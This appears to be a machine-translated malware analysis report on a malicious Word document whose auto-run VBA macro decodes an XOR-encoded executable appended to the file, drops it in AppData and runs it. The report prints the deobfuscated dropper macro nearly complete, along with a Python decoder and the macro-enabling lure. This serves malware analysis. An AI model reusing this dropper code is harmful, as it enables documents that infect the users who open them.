Analysis Report: embedding malicious payload Word documents

Analysis Report: embedding malicious payload Word documents

 

A week ago, Mr. Xavier Mertens, sans isc management and freedom security consultant, analyzed a malicious Word document. The following is his analysis report.

Event background

Last week, I was busy studying an interesting Malicious Word document in a security incident. In today's society, there are not new OLE documents with bad intentions. I receive many such things in my email every day. These attacks will continue until they find a better way to attack the end user's computer. Generally, malicious macros need to use social engineering techniques to trick users into executing them, and then download a new payload through the object MSXML2.ServerXMLHTTP.

The following is an example of constructing a confusion object to initiate a GET request:

BHJQWGDHJQWGDWQ = "MSXML2." & "Ser" & "ver" & "X" & "MLH" & "TT" & "P"Set Tghafsdghqhjwgdhjqwgdjhqwgdqwd = CreateObject(BHJQWGDHJQWGDWQ)Tghafsdghqhjwgdhjqwgdjhqwgdqwd.Open "G" & "" & "ET", ggFw

In fact, the quality of this event depends on your position. This sample file actually helps our researchers collect the IP addresses, URLs, domain names, and file names of IOC. Of course, it is very easy to decrypt obfuscation malicious macros and collect IOC.

In the malicious event I studied, the malicious macros in the Word documents did not generate any network traffic, and the payload was placed at the end of the Word documents from the very beginning. This document was generated on July 15, September 2015 and scored only 2/43 in VT three days ago. I was the first person to submit it. The content format of this word document is very strict, including content that can seduce victims. I have to mention that I used the Didier Steven s toolbox to analyze this malicious document.

Malicious File Analysis Report

This document was created by the user Helmut in September 3, 2015 and contains two macros:

$ oledump.py malicious.doc  1:       121 '\x01CompObj'  2:      4096 '\x05DocumentSummaryInformation'  3:      4096 '\x05SummaryInformation'  4:     23860 '1Table'  5:    781575 'Data'  6:       486 'Macros/PROJECT'  7:        71 'Macros/PROJECTwm'  8: m     940 'Macros/VBA/ThisDocument'  9:      3256 'Macros/VBA/_VBA_PROJECT' 10:       569 'Macros/VBA/dir' 11: M    6052 'Macros/VBA/islamabad' 12:    257675 'WordDocument'

One interesting macro is in the above 11th lines of code, that is, the place named islamabad (the capital of islamabad, Pakistan. This is a classic obfuscated macro, which can be extracted using the following command:

$ oledump.py -s 11 -v malicious.doc

Note: I have made some modifications to the macro code and decrypted the obfuscated code so that readers can better read it.

This malicious payload (PE file) is placed at the end of the Word document together with the additional data (payload size and checksum). Let's take a look at the Code:

Attribute VB_Name = "islamabad"Public var_Filename1 As StringPublic var_Path1 As String

The first function extracts the checksum of the additional data stream:

Function func_Checksum(var_Data() As Byte, var_Len As Long) As Byte    For I = 0 To var_Len - 1        func_Checksum = func_Checksum Xor var_Data(I)    Next IEnd Function

The following function performs XOR on the binary data stream and decrypts it in the next function:

Function func_DecodeBinary(var_Data() As Byte, var_Len As Long) As Boolean    Dim var_IV1 As Byte    var_IV1 = 11    For I = 0 To var_Len - 1        var_Data(I) = var_Data(I) Xor var_IV1        var_IV1 = ((var_IV1 Xor 13) Xor (I Mod 256))    Next I    func_DecodeBinary = TrueEnd Function

This VBA function has changed the document layout, but I don't quite understand why:

Function func_FormatDocument() As Boolean    ActiveDocument.GrammarChecked = False    ActiveDocument.SpellingChecked = False    ActiveDocument.Select    Selection.Font.ColorIndex = wdBlack    Selection.Font.Underline = wdUnderlineNone    Selection.HomeKey    For Each sec In ActiveDocument.Sections        For Each head In sec.Headers            head.Range.Delete        Next    Next    ViewDocument = TrueEnd Function Sub AutoClose()ActiveDocument.SaveEnd Sub

When the document is opened, the main macro is automatically executed:

Sub AutoOpen()    On Error GoTo ErrorCondition1    Dim var_Dummy1 As Boolean    var_Dummy1 = func_FormatDocument()    Dim fh_File1    Dim var_Filesize As Long    Dim var_BinarySize As LongDim var_Checksum As Byte

Let's get the file size, open it and extract the checksum (EOF-4), and the binary data stream size (EOF-3 ):

    var_Filesize = FileLen(ActiveDocument.FullName)    fh_File1 = FreeFile    Open (ActiveDocument.FullName) For Binary As #fh_File1    Get #fh_File1, (var_Filesize - 4), var_Checksum    Get #fh_File1, (var_Filesize - 3), var_BinarySize     If var_BinarySize < 8 Then        GoTo ErrorCondition1    End If     If (var_BinarySize + 4) > var_Filesize Then        GoTo ErrorCondition1End If

The following script calculates the starting position of the data stream and estimates an appropriate byte array:

    Dim var_Offset As Long    var_Offset = var_Filesize - (var_BinarySize + 4)    Dim var_BinaryData1() As ByteReDim var_BinaryData1(var_BinarySize - 1)

Then, the binary malicious file is extracted and decrypted:

    Get #fh_File1, var_Offset, var_BinaryData1    Close #fh_File1    If Not func_DecodeBinary(var_BinaryData1(), var_BinarySize) Then        GoTo ErrorCondition1End If

Comparison checksum:

    Dim var_Dummy2 As Byte    var_Dummy2 = func_Checksum(var_BinaryData1(), var_BinarySize)    If var_Checksum <> var_Dummy2 Then        GoTo ErrorCondition1End If

The default path of the released payload is confused (the actual value is appdata \ Microsoft \ Word ):

var_Path1 = Environ(Chr(97) & Chr(112) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(97)) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100)

The Scripting. FileSystemObject object is also obfuscated:

Set var_Object1 = CreateObject("Scripting" & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))

Of course, to prevent the default path from not existent (not in this example), the script uses another alternative path (appdata ).

    If Not var_Object1.FolderExists(var_Path1) Then        var_Path1 = Environ(Chr(97) & Chr(112) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(97))    End If     Set var_Object1 = Nothing    Dim fh_File2fh_File2 = FreeFile

The released payload file name is also confused (real name: wfletxavb.exe ):

Note: I don't know the file name here. Why isn't it a common dynamic random generation. In this way, the file system can avoid malicious binary stream detection.

    var_Filename1 = var_Path1 & "\" & Chr(119) & Chr(102) & Chr(108) & Chr(101) & Chr(116) & Chr(120) & Chr(97) & Chr(118) & Chr(98) & Chr(46) & Chr(101) & Chr(120) & Chr(101)    Open (var_Filename1) For Binary As #fh_File2    Put #fh_File2, 1, var_BinaryData1    Close #fh_File2Erase var_BinaryData1

Now we want to execute:

    Set var_Object2 = CreateObject("WScript.Shell")    var_Object2.Exec var_Filename1    Exit Sub ErrorCondition1:    Close #fh_File1    Close #fh_File2    ActiveDocument.SaveEnd Sub

Through backward macros, we can guess the starting position of the binary stream, and then extract it through Didier's cut-bytes.py script tool. We need to skip the end byte of the document, including the payload size and checksum.

Note: Didier adds a new feature to his tool, which helps us extract data: that is, you can specify the bytes at the end of the file (for details, see the command code at-5 below ):

$ cut-bytes.py "
 
  :-5" malicious.doc >binary.data$ file binary.databinary.data: data
 

The decoding function in the macro. We can use it to write a dedicated decoder for the translate. py script tool:

def FileDecode(input):    output = ''    code = 11    for iIter in range(len(input)):        output += chr(ord(input[iIter]) ^ code)        code = (code ^ 13) ^ (iIter % 256)return output

Finally, we can decode the binary stream and obtain a PE file:

$ cat binary.data | translate.py -f -s decoder_caseXXXX.py -o binary.exe FileDecode$ file binary.exebinary.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

I did not submit this PE sample file to VirusTotal, but it is obviously a malicious file.

This file is composed of OLE files, PE files, checksum files, and PE file lengths. With this file, hackers can quickly generate a new encrypted PE file and add it to the same Word document. I am sorry that I cannot share samples here, because this analysis study is not over yet.

Event postscript

Mr. Didier Steven mentioned above makes a subsequent supplement to this article. In the above analysis, Xavier mentioned an unknown VBA function, which is called func_FormatDocument. This function will change the document layout. Here Didier analyzes the function of this function.

This function is actually part of social engineering skills. Under normal circumstances, Microsoft Office macros are disabled by default in email attachments. If hackers cannot cheat users and enable macros, this attack will fail.

Therefore, hackers use a small method to trick users into enabling macros. In fact, it is trying to convince the user that the document contains confidential or confidential information, and then the user needs to enable the macro to view the information. This word document may contain hidden, encoded, and encrypted content. What do you need to do to uncover its mysteries. This section of the VBA function func_FormatDocument is part of such a complex social engineering technique. After you select to enable macros, this function will remove the font color from white to black to "decrypt" The Hidden content and display the instructions for users to view "real content. Hackers use this mentally retarded method to fool users. By stealing the bar, they enable the VBA macro and execute malicious payload.